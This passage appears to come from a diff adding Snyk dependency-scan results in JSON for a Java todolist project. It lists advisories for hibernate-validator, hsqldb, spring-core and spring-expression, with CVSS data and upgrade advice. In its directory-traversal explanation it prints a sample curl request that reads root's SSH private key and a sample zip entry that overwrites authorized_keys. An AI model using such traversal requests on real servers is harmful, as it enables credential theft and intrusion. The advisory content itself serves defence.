When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-validator@6.0.23.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": 
"3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], 
+ "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": 
"2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": 
"3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, 